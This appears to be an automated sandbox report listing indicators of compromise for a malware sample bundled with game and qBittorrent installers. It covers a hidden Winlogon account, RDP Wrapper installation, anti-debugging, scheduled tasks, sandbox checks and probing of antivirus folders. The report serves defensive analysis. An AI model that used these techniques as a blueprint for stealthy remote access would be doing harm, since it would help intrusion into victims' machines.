Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
245009	ip-api.com

Modifies WinLogon 2 TTPs 4 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	GameGuard.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 46 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/896-1646-0x000000013F960000-0x0000000140A74000-memory.dmp	autoit_exe
behavioral1/memory/896-1649-0x000000013F960000-0x0000000140A74000-memory.dmp	autoit_exe
behavioral1/memory/1476-1903-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/1476-1902-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/1476-1904-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/1476-1906-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/1476-1907-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/1476-1905-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/2936-2112-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2936-2114-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2936-2115-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2936-2116-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2936-2113-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2936-2111-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2936-2131-0x000000013F5C0000-0x0000000140689000-memory.dmp	autoit_exe
behavioral1/memory/2516-2133-0x000000013F020000-0x0000000140020000-memory.dmp	autoit_exe
behavioral1/memory/2516-2134-0x000000013F020000-0x0000000140020000-memory.dmp	autoit_exe
behavioral1/memory/2516-2135-0x000000013F020000-0x0000000140020000-memory.dmp	autoit_exe
behavioral1/memory/2516-2136-0x000000013F020000-0x0000000140020000-memory.dmp	autoit_exe
behavioral1/memory/2516-2138-0x000000013F020000-0x0000000140020000-memory.dmp	autoit_exe
behavioral1/memory/356-2185-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/356-2186-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/356-2184-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/356-2187-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/356-2188-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/356-2196-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/2444-2281-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/2444-2274-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/2444-2283-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/2444-2282-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/2444-2272-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/2444-2276-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/356-2530-0x000000013F8D0000-0x0000000140868000-memory.dmp	autoit_exe
behavioral1/memory/2516-2564-0x000000013F020000-0x0000000140020000-memory.dmp	autoit_exe
behavioral1/memory/1984-2574-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/1984-2578-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/1984-2577-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/1984-2576-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/1984-2579-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/1984-2575-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/1476-2583-0x000000013FD10000-0x0000000140E24000-memory.dmp	autoit_exe
behavioral1/memory/3788-2587-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/3788-2588-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/3788-2589-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/3788-2590-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe
behavioral1/memory/3788-2591-0x000000013FD40000-0x000000014133E000-memory.dmp	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File opened for modification	C:\Windows\SysWOW64\unsecapp.exe	IP.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs

pid	Process
896	Setup.exe
2812	Setup.exe
1476	Setup.exe
2516	update.exe
2936	GameGuard.exe
2884	IP.exe
356	smss.exe
2444	unsecapp.exe
3500	unsecapp.exe
1984	unsecapp.exe
3788	unsecapp.exe
1944	unsecapp.exe
3704	unsecapp.exe
2876	unsecapp.exe
1944	unsecapp.exe
2112	unsecapp.exe
2408	unsecapp.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\home_button.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\inspect_hero_model_effect.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\IObit	update.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_hu.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_sk.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qtbase_fi.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\AnselSDK64.dll	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\campaign_ambient.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\700_patchbg.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti7_header_undersea.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\GfeSDK.dll	GameInstall.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_ar.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_gl.qm	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Transmission	update.exe
File created	C:\Program Files (x86)\qBittorrent\qt.conf	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_fa.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qtbase_it.qm	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti9_flags.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\cm_spinwheel.vpk	GameInstall.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_ja.qm	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti8_header_undersea.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_winter2017_header.vpk	GameInstall.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qtbase_ko.qm	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti8_header.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\find_match_status.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\halloween2015_bats.vpk	GameInstall.exe
File opened for modification	C:\Program Files\AVG	update.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\campaign_desertbabyroshan.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\hero_relics_fx.vpk	GameInstall.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qtbase_gd.qm	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti6_header.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti7_flags.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\ispc_texcomp.dll	GameInstall.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_pt.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\qBittorrent\uninst.exe	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti6_rewardintro.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\dtdata.dll	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\ispc_texcomp.dll	GameInstall.exe
File opened for modification	C:\Program Files (x86)\GPU Temp	update.exe
File opened for modification	C:\Program Files\NETGATE	update.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\bluespotlight.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\darkmoon_frontpage.vpk	GameInstall.exe
File opened for modification	C:\Program Files\CPUID\HWMonitor	update.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_it.qm	qbittorrent_4.1.9_setup.exe
File opened for modification	C:\Program Files\Rainmeter	update.exe
File opened for modification	C:\Program Files\Process Lasso	update.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qt_zh_CN.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti7_header.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\halloween2015_candles.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\home_button.vpk	GameInstall.exe
File opened for modification	C:\Program Files\Bitdefender Agent	update.exe
File opened for modification	C:\Program Files\DrWeb	update.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\battlepass_ti6_rewardintro.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\cm_spinwheel.vpk	GameInstall.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\dueling_fates_main.vpk	GameInstall.exe
File opened for modification	C:\Program Files (x86)\Rutor\èãðû\Asset\EMP.dll	GameInstall.exe
File created	C:\Program Files (x86)\qBittorrent\translations\qtbase_uk.qm	qbittorrent_4.1.9_setup.exe
File created	C:\Program Files (x86)\Rutor\èãðû\Asset\720_patchbg.vpk	GameInstall.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
356	sc.exe
1956	sc.exe
1492	sc.exe
2548	sc.exe
2636	sc.exe
2996	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	DllHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DllHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	DllHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	DllHost.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

pid	Process
2620	schtasks.exe
648	schtasks.exe
1968	schtasks.exe
2012	schtasks.exe
2036	schtasks.exe
1684	schtasks.exe
756	schtasks.exe
996	schtasks.exe
1572	schtasks.exe

Delays execution with timeout.exe 3 IoCs

pid	Process
2256	timeout.exe
3156	timeout.exe
992	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\magnet\shell\open\command	qbittorrent_4.1.9_setup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "2"	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0\MRUListEx = 0400000001000000030000000200000000000000ffffffff	taskmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent\shell\open	qbittorrent_4.1.9_setup.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.torrent	qbittorrent_4.1.9_setup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\NodeSlot = "5"	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = ffffffff	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\MRUListEx = ffffffff	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\TV_TopViewVersion = "0"	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	qbittorrent.exe
Key created	\REGISTRY\MACHINE\Software\Classes\magnet	qbittorrent_4.1.9_setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\magnet\shell	qbittorrent_4.1.9_setup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	qbittorrent.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database	smss.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{0B2BAAEB-0042-4DCA-AA4D-3EE8648D03E5}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616193"	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{631958A6-AD0F-4035-A745-28AC066DC6ED}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{631958A6-AD0F-4035-A745-28AC066DC6ED}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202020202020202020202020202	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\magnet	qbittorrent_4.1.9_setup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	qbittorrent.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\magnet\shell\open\command\ = "\"C:\\Program Files (x86)\\qBittorrent\\qbittorrent.exe\" \"%1\""	qbittorrent_4.1.9_setup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202	qbittorrent.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0\4 = 5c00310000000000a5586d36122050524f4752417e330000440008000400efbeee3a851aa5586d362a00000085010000000001000000000000000000000000000000500072006f006700720061006d004400610074006100000018000000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\NodeSlot = "6"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{3F2A72A7-99FA-4DDB-A5A8-C604EDF61D6B}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616193"	qbittorrent.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\TV_FolderType = "{0B2BAAEB-0042-4DCA-AA4D-3EE8648D03E5}"	qbittorrent.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\MRUListEx = ffffffff	qbittorrent.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\TV_FolderType = "{631958A6-AD0F-4035-A745-28AC066DC6ED}"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\3\NodeSlot = "8"	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	qbittorrent.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	qbittorrent.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\3 = 9e0000001a00eebbfe23000010009fae90a93ba0804e94bc9912d750410400002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbeebaa2b0b4200ca4daa4d3ee8648d03e58207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	qbittorrent.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\3\MRUListEx = ffffffff	qbittorrent.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe
File opened for modification	C:\ProgramData\Setup\winmgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\WinMgmts:\	IP.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2124	qbittorrent.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2612	chrome.exe
2612	chrome.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
2124	qbittorrent.exe
2612	chrome.exe
2612	chrome.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
896	Setup.exe
2544	chrome.exe
2544	chrome.exe
2544	chrome.exe
2544	chrome.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
2812	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
